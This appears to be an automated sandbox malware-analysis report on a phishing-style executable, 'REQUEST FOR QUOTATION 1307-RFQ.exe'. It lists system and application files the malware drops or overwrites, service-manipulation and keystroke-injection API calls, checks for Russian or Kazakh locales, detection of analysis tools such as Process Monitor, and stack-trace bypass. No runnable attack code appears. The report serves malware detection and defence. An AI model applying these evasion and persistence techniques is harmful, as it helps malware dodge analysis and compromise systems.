Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B0CBD0

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 7_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	7_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 8_2_01ED52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	8_2_01ED52A0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 10_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	10_2_00B852A0
Source: C:\Windows\System32\Spectrum.exe	Code function: 15_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	15_2_005452A0
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 17_2_00D152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	17_2_00D152A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

API/Special instruction interceptor: Address: C9328C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXEO
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1684737431.0000000000C38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXERG

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597569	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597148	Jump to behavior
